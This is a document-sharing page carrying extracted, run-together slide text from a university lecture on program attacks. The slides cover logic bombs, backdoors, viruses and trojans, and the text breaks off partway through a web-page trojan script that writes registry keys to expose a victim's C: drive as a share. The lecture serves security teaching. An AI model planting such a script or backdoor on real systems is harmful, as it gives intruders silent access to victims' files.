欢迎来到天天文库
浏览记录
ID:26255829
大小:409.50 KB
页数:36页
时间:2018-11-25
《网络安全6-程序攻击》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、网络安全罗敏武汉大学计算机学院jsjgfzx@whu.edu.cn1第5章缓冲区溢出攻击回顾缓冲区溢出攻击的基本原理、方法缓冲区溢出程序的原理及要素攻击UNIX攻击WINDOWS2第6章程序攻击本章列出了常用的程序攻击方法,介绍了逻辑炸弹、后门、病毒及特洛伊木马等的概念和特点,并用实例说明工作原理,提供和分析了部分代码以便更深入地学习和了解技术原理。3第6章程序攻击6.1逻辑炸弹攻击6.2植入后门6.3病毒攻击6.4特洛伊木马攻击6.5其它程序攻击4逻辑炸弹攻击定义一种隐藏于计算机系统中以某种方式触发后对计算机系统硬件、软件或数据进行恶意破坏的程序代码触发方式时间触发
2、、特定操作触发、满足某一条件的触发等第6章第1节5逻辑炸弹攻击特征隐蔽性:逻辑炸弹一般都比较短小,容易附着在系统或文件上而不容易察觉,也可能被恶意隐藏在一些常用工具软件代码中攻击性:逻辑炸弹都具有攻击性,一旦被激发,或是干扰屏幕显示,或降低电脑运行速度,或是删除程序,破坏数据逻辑炸弹没有“传染性”第6章第1节6植入后门定义后门是计算机入侵者攻击网上其它计算机成功后为方便下次进入这台被攻击计算机而采取的一些欺骗手段和程序目的再次进入、不被发现健壮性第6章第2节7植入后门攻击方法获取尽可能多的用户口令,并不会被管理员察觉或查封更改配置例如:rhosts替换程序(包括源代码
3、,函数库,内核)要点:时间、校验和开设新的服务,定时开启服务第6章第2节8植入后门隐藏代码:坏扇区,Boot通讯:TCP,UDP和ICMPShell后门:TCP/UDP/ICMP第6章第2节9植入后门隐藏执行DLLRundll32.exeDllcache动态嵌入挂接API,全局钩子(HOOK),远程线程第6章第2节10植入后门Unix后门netcatncpbshVetescan后门软件http://www.rootkit.com第6章第2节11病毒攻击详见第13章网络病毒防治第6章第3节12特洛伊木马攻击定义特洛伊木马,简称木马,英文名为Trojanhorse计算机领
4、域的“特洛伊木马(Trojan)”,是指附着在应用程序中或者单独存在的一些恶意程序,它可以利用网络远程响应网络另一端的控制程序的控制命令,实现对感染木马程序的计算机的控制,或者窃取感染木马程序的计算机上的机密资料。第6章第4节13特洛伊木马攻击工作原理木马程序一般利用TCP/IP协议,采用C/S结构,分为客户端和服务器端两个部分服务器端程序运行于被攻击的计算机上,而客户端程序在控制者的计算机上运行客户端程序可以同时向很多服务端程序发送命令以控制这些计算机。客户端程序一般提供友好的操作界面,以便于用户的操作,其功能可能很多第6章第4节14特洛伊木马攻击功能分类远程访问型
5、木马密码发送型木马键盘记录型木马毁坏型木马FTP型木马第6章第4节15特洛伊木马攻击通讯分类主动型木马反弹型木马嵌入式木马第6章第4节16特洛伊木马攻击冰河文件浏览器屏幕监视键盘鼠标控制其它控制支持配置glacier第6章第4节17特洛伊木马攻击反弹型木马它利用防火墙对内部发起的连接请求无条件信任的特点,假冒是系统的合法网络请求与木马的客户端建立连接,从而达到对被攻击计算机控制的目的第6章第4节18特洛伊木马攻击网络神偷远程文件访问,而不是远程控制反弹端口HTTP隧道服务器端上线通知功能通讯加密第6章第4节19特洛伊木马攻击嵌入式木马嵌入网页的共享式木马<
6、head>
7、D58A0b}");aa.createInstance();commandsh=aa.GetObject();{commandsh.RegWrite("HKLM\SoftWare\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Flags",302,"REG_DWORD");commandsh.RegWrite("HKLM\SoftWare\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Type",0,"REG
此文档下载收益归作者所有